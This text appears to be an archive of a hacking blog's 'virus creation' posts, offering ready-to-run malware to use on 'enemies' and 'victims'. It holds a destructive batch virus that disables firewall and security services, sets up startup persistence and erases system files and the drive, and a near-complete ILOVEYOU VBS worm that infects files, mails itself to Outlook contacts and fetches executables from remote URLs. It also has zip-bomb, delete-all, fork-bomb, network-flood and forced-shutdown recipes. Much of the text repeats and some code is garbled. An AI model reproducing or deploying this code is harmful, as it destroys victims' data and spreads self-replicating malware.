.I will not be responsible for any damages .
PROCEDURE TO CREATE THIS VIRUS
========================
Open Notepad and copy paste the code provided below and save it as(use "save as" option) anynames.bat (ex. hackosys.bat) after saving don't open it on your computer or your system will be deleted and then will shutdown as the commands says. Use this virus on your Enemy Not on your friends..
Code:
start
color 5
title Your ----ed, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now ----ed :D
msg * You got owned! :o
msg * Say Bye to your computer n00b
msg * hackosys.blogspot.com
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP
Showing posts with label VIRUS CREATION. Show all posts
Showing posts with label VIRUS CREATION. Show all posts
Friday, October 1, 2010
Wednesday, September 29, 2010
The ZIP of Death
This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.
1) Make a.txt file
2) Open and type the null character (alt + 255)
3) Press ctrl + a then ctrl + v a couple times to make some null bytes
4) If u have a hexeditor make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name accordinly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
8) Now every copy is made into a super copy and repeat
9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!
The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555
Just add some more and the file will expand amazingly
Make sure to not open this after
You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
1) Make a.txt file
2) Open and type the null character (alt + 255)
3) Press ctrl + a then ctrl + v a couple times to make some null bytes
4) If u have a hexeditor make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name accordinly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
8) Now every copy is made into a super copy and repeat
9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!
The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555
Just add some more and the file will expand amazingly
Make sure to not open this after
You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
Tuesday, September 14, 2010
i love you " virus "
it's programmed this code i update some futures ,simple script u can upload it on your site by inject in
your site and give to your victim as link "http:\\yoursite.com " and it will copy it self in his machine orAttached but in Microsoft Outlook
This code didn't need Microsoft Visual Studio copy this code to u notepad and but extension ".vbs"
Check attached txt code and changes it to extension to "vbs" instated of "txt" and u can convert the code to
visual basic 6.0 if u like vb just tell me
'***************************************
rem by: chakshu00grg@gmail.com hackosys
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
'*******************************************************
'End
Fake virus detected(HARMLESS)
First we have to open notepad again
1.type this in or copy.
@echo off
echo WARNING VIRUS DETECTED
echo System check
echo -
echo Hard drive - FAILED
echo -
echo RAM - FAILED
echo -
echo Disk Drive - FAILED
echo -
echo Connection - FAILED
echo -
echo code 754*sd56625
echo -
echo Hard drive must be formatted to resume windows
echo -
PAUSE
echo -
echo -WARNING
echo -
echo Hard drive has been formatted
echo -
echo -WARNING
echo -
PAUSE
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
pause
2.Save as a.bat
3.convert the a.bat to an exe file which lets you name it and change the icon.
4.to convert it you will need to goto www.f2ko.de and download bat_to_exe
5. put it on some ones computer and watch them freak out
RESULTS
Look at the screen shot below and this is what the person will see. where it says pause you have to press a key to see the writing below it.
1.type this in or copy.
@echo off
echo WARNING VIRUS DETECTED
echo System check
echo -
echo Hard drive - FAILED
echo -
echo RAM - FAILED
echo -
echo Disk Drive - FAILED
echo -
echo Connection - FAILED
echo -
echo code 754*sd56625
echo -
echo Hard drive must be formatted to resume windows
echo -
PAUSE
echo -
echo -WARNING
echo -
echo Hard drive has been formatted
echo -
echo -WARNING
echo -
PAUSE
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
pause
2.Save as a.bat
3.convert the a.bat to an exe file which lets you name it and change the icon.
4.to convert it you will need to goto www.f2ko.de and download bat_to_exe
5. put it on some ones computer and watch them freak out
RESULTS
Look at the screen shot below and this is what the person will see. where it says pause you have to press a key to see the writing below it.
Monday, September 13, 2010
Types of virus
Virus are classifed mainly on based on what they affect & how, size.
Based on what they effect.
1.Computer virus.
2.Mobile virus -Nowerdays many virus are written for mobile They spread through gprs/bluetooth.
3.Music player virus -There exsists only a handful of such virus.Theu spread when you add a song /video or dwnload some thing
Based on size
•Tiny virii - These are under 500 bytes. They are designed to be undetectable due to their small size. TINY is one such virus. They generally very simple because their code length is so limited.
•Large Virus- They are over 1,500 bytes. They are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'stealth' virus in existence. •Other virus- These virus are easily detectable. Many virus are of this type.
Based on How they effect
All these many seam like compurt virus only but that is only partly true as your mobile too has an OS.
•Boot Sector Virus: This virus replaces or implants itself in the boot sector---an area of the hard drive (or any other disk) accessed when you first turn on your computer. This kind of virus can prevent you from being able to boot your hard disk.
•File Virus: This infects your applications. These then spread the virus by infecting other applications. You need to run or open these files.
•Macro Virus: These account for about 75 percent of viruses found in the wild. They are written using a simplified macro programming language, these viruses affect Microsoft Office applications, such as Word and Excel, and . A document infected with a macro virus generally modifies a pre-existing, commonly used command (such as Save) to trigger its payload upon execution of that command.
•Multipartite Virus: These infects both files and the boot sectorthat infect your system dozens of times before it's caught.
•Polymorphic Virus: A well written virus of this type is usually difficult for antivirus scanners to detect but these are usually not that well written. They changes code whenever it passes to another machine.
•Stealth Virus: These hides its presence by making an infected file not appear infected, but doesn't usually stand up to antivirus software.
<!--199a7bf0ff1b425f8670f4f00421746b-->
<!--03909001b799489bbd4f7e6dde8301aa-->
Based on what they effect.
1.Computer virus.
2.Mobile virus -Nowerdays many virus are written for mobile They spread through gprs/bluetooth.
3.Music player virus -There exsists only a handful of such virus.Theu spread when you add a song /video or dwnload some thing
Based on size
•Tiny virii - These are under 500 bytes. They are designed to be undetectable due to their small size. TINY is one such virus. They generally very simple because their code length is so limited.
•Large Virus- They are over 1,500 bytes. They are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'stealth' virus in existence. •Other virus- These virus are easily detectable. Many virus are of this type.
Based on How they effect
All these many seam like compurt virus only but that is only partly true as your mobile too has an OS.
•Boot Sector Virus: This virus replaces or implants itself in the boot sector---an area of the hard drive (or any other disk) accessed when you first turn on your computer. This kind of virus can prevent you from being able to boot your hard disk.
•File Virus: This infects your applications. These then spread the virus by infecting other applications. You need to run or open these files.
•Macro Virus: These account for about 75 percent of viruses found in the wild. They are written using a simplified macro programming language, these viruses affect Microsoft Office applications, such as Word and Excel, and . A document infected with a macro virus generally modifies a pre-existing, commonly used command (such as Save) to trigger its payload upon execution of that command.
•Multipartite Virus: These infects both files and the boot sectorthat infect your system dozens of times before it's caught.
•Polymorphic Virus: A well written virus of this type is usually difficult for antivirus scanners to detect but these are usually not that well written. They changes code whenever it passes to another machine.
•Stealth Virus: These hides its presence by making an infected file not appear infected, but doesn't usually stand up to antivirus software.
<!--199a7bf0ff1b425f8670f4f00421746b-->
<!--03909001b799489bbd4f7e6dde8301aa-->
Change Files extentions of all files at once
In order to corrupt files all that we do is change files to non-working TXT files or some other format.
REN *.EXE *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
REN *.LNK *.TXT
Just copy the above code into a Notepad file and save it .BAT This is not it You can even change files to any other extension like
*.JPEG *.DOC
*.COM means all files with extension .COM. Ren is a dos command to rename. The above cde just renames all . .COM files to .TXT.
REN *.EXE *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
REN *.LNK *.TXT
Just copy the above code into a Notepad file and save it .BAT This is not it You can even change files to any other extension like
*.JPEG *.DOC
*.COM means all files with extension .COM. Ren is a dos command to rename. The above cde just renames all . .COM files to .TXT.
Saturday, September 11, 2010
How to crash your computer
Just go to notepad (start>all programs>accessories>notepad) and type exactly this script between the lines:
@echo off:crashstartgoto crash
goto file>save as>crash.bat
and save! But remember when you open this file command prompt windows will open until the computer crashes or freezes so it would be better if you placed this on a friend's or the school's computers
There are different scripts that you can write in notepad to get a batch file with similar reactions
To recover your desktop from this just directly pull the plugs from your PC and put the plugs back in and start it up again or just hold the power button on your PC until it turns off and restart again.
@echo off:crashstartgoto crash
goto file>save as>crash.bat
and save! But remember when you open this file command prompt windows will open until the computer crashes or freezes so it would be better if you placed this on a friend's or the school's computers
There are different scripts that you can write in notepad to get a batch file with similar reactions
To recover your desktop from this just directly pull the plugs from your PC and put the plugs back in and start it up again or just hold the power button on your PC until it turns off and restart again.
Flood your network
This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.
The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
Just copy the code into a notepad file and save it as anything.bat. When you run it will start flodding your network.
As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly.
The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
Just copy the code into a notepad file and save it as anything.bat. When you run it will start flodding your network.
As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly.
Thursday, September 9, 2010
Disable internet temporarily
This is the virus writing basics section. Today we are going to show you how to disable Internet. This is demonstrated using Batch/ Dos Programing.
ipconfig /release
echo You Internet Been HACKED!
Just copy the above code in to a notepad file and save it as anything.BAT. This will temporarily disable your Internet. Actually all the job is done by the first line only the second line just informs that the Internet has been disabled
As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly. You could land into grave trouble if you spread this.
ipconfig /release
echo You Internet Been HACKED!
Just copy the above code in to a notepad file and save it as anything.BAT. This will temporarily disable your Internet. Actually all the job is done by the first line only the second line just informs that the Internet has been disabled
As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly. You could land into grave trouble if you spread this.
Delete all files virus
This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.
DOS programming
Paste the given code in notepad
@Echo off
Del C:\ *.*y
And save it like any_name.bat . Now run this file... All the data is gone from your PC.
LINUX
Just run the command
rm will delete all files of any extention
DOS programming
Paste the given code in notepad
@Echo off
Del C:\ *.*y
And save it like any_name.bat . Now run this file... All the data is gone from your PC.
LINUX
Just run the command
rm will delete all files of any extention
Clone virus C, C++
This is a virus code of clone virus in c/c++. This virus clones itself. You can convert it into java by making small changes that any java programmer can make out.
Before you use this virus you need to compile . Just select the complie option in your c compiler. DONT RUN IT OR SELECT THE RUN OPTION, I repeat dont run it. Now exit the compiler . Find the size of the .exe file generated in bytes. Replace the value of "X" with is value(in bytes).
Now recompile it and exit.
What this virus does is it makes all the files in the current directory a virus. You need to find out the header files for yourself as this only for educational purpose . Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
This is intended for c/c++ programmers who have knowledge about data structure. This is only and only for knowledge sake
Before you use this virus you need to compile . Just select the complie option in your c compiler. DONT RUN IT OR SELECT THE RUN OPTION, I repeat dont run it. Now exit the compiler . Find the size of the .exe file generated in bytes. Replace the value of "X" with is value(in bytes).
Now recompile it and exit.
What this virus does is it makes all the files in the current directory a virus. You need to find out the header files for yourself as this only for educational purpose . Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
This is intended for c/c++ programmers who have knowledge about data structure. This is only and only for knowledge sake
BLACK WOLF VIRUS
This is the code of the "Black Wolf" virus.This is in c. You are at your own risk. If you spread this you will land behind the bar. We are giving this only for educational Purpose. You need to guess the header file for yourself.
This virus corrupts all the .com files . so be extremely careful what you do with it.
This virus corrupts all the .com files . so be extremely careful what you do with it.
Doom virus
Replace location to the location where you want the file to be
This is not actually a virus but a practical joke. It will make your victim believe that his system is under seize and is infected. Remember you need to compile it only (.ie click on compile option ) and not run it(i.e click on run option). This will generate the .EXE file.
Even though this is just a prank just be careful to whom you spread it as you could still get into minor trouble.
This is not actually a virus but a practical joke. It will make your victim believe that his system is under seize and is infected. Remember you need to compile it only (.ie click on compile option ) and not run it(i.e click on run option). This will generate the .EXE file.
Even though this is just a prank just be careful to whom you spread it as you could still get into minor trouble.
Virus code tutorial
Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide
this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux
First alp/asm
back: add c,b
loop back
This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.
Now lets try to create a simple Linux virus in c.
system("poweroff");
This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.
let's see one more linux virus of the same type
system("rm *.*");
This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.
Lets see the same codes for windows.
To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown
Now lets disable Internet
ipconfig /release
echo You Internet Been HACKED!
What if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.
this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux
First alp/asm
back: add c,b
loop back
This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.
Now lets try to create a simple Linux virus in c.
system("poweroff");
This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.
let's see one more linux virus of the same type
system("rm *.*");
This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.
Lets see the same codes for windows.
To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown
Now lets disable Internet
ipconfig /release
echo You Internet Been HACKED!
What if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.
Sunday, September 5, 2010
Make a Prank Virus (Windows)
To take revenge on anyone by making their computer shut down as soon as they turn it on.......
shutdown -s -t 00
Method 2 (Causes Explorer.exe to crash)
cls
:A
color 0a
@ echo off
echo Wscript.Sleep
DEL C:\WINDOWS 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\mkdir
h4x
DEL C:\WINDOWS
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exeC:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
Save this file as "virus.bat".
1.Click File
2.Click Save As
3.Change the Save as type: to All Files
4.Select ANSI as the Encoding type
5.Name the file virus.bat
Click Start->All programs here on this sub-menu right click on "start up" and select Explore from options given. This opens "start up" folder now cut your virus.bat file and paste it into this start up folder opened.
For more effectiveness right click on your vire.bat file go to properties and select the option Hidden and press OK
You have planted a prank and annoying virus into the computer.
The next time this computer is turned on' your batch file (virus.bat) in the start up folder is executed automatically which commands the computer to shutdown in 0 seconds(i.e., immediately).
Now, anyone turning on the computer will have no time to do anything because it will shutdown automatically every time the system turns on and comes to desktop. edit TipsIf instead of -s in method 1, -r is used, the computer is commanded to restart and when restarted automatically it is again commanded to restart and the process goes on indefinite
Method 1: If you use windows vista you may have to use a / instead of a -.
Method 2: To cancel the "virus" press [Alt]+[Tab] simultaneously.
To disable these "viruses" start the computer in Safe Mode and delete the .bat file from the Startup folder.
edit WarningsMake sure to have a Linux CD on hand to undo this.
Some people might not enjoy this prank, so make sure to chose your victim carefully
shutdown -s -t 00
Method 2 (Causes Explorer.exe to crash)
cls
:A
color 0a
@ echo off
echo Wscript.Sleep
DEL C:\WINDOWS 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\mkdir
h4x
DEL C:\WINDOWS
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exeC:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
Save this file as "virus.bat".
1.Click File
2.Click Save As
3.Change the Save as type: to All Files
4.Select ANSI as the Encoding type
5.Name the file virus.bat
Click Start->All programs here on this sub-menu right click on "start up" and select Explore from options given. This opens "start up" folder now cut your virus.bat file and paste it into this start up folder opened.
For more effectiveness right click on your vire.bat file go to properties and select the option Hidden and press OK
You have planted a prank and annoying virus into the computer.
The next time this computer is turned on' your batch file (virus.bat) in the start up folder is executed automatically which commands the computer to shutdown in 0 seconds(i.e., immediately).
Now, anyone turning on the computer will have no time to do anything because it will shutdown automatically every time the system turns on and comes to desktop. edit TipsIf instead of -s in method 1, -r is used, the computer is commanded to restart and when restarted automatically it is again commanded to restart and the process goes on indefinite
Method 1: If you use windows vista you may have to use a / instead of a -.
Method 2: To cancel the "virus" press [Alt]+[Tab] simultaneously.
To disable these "viruses" start the computer in Safe Mode and delete the .bat file from the Startup folder.
edit WarningsMake sure to have a Linux CD on hand to undo this.
Some people might not enjoy this prank, so make sure to chose your victim carefully
Friday, August 27, 2010
CD Drive Trick !!!
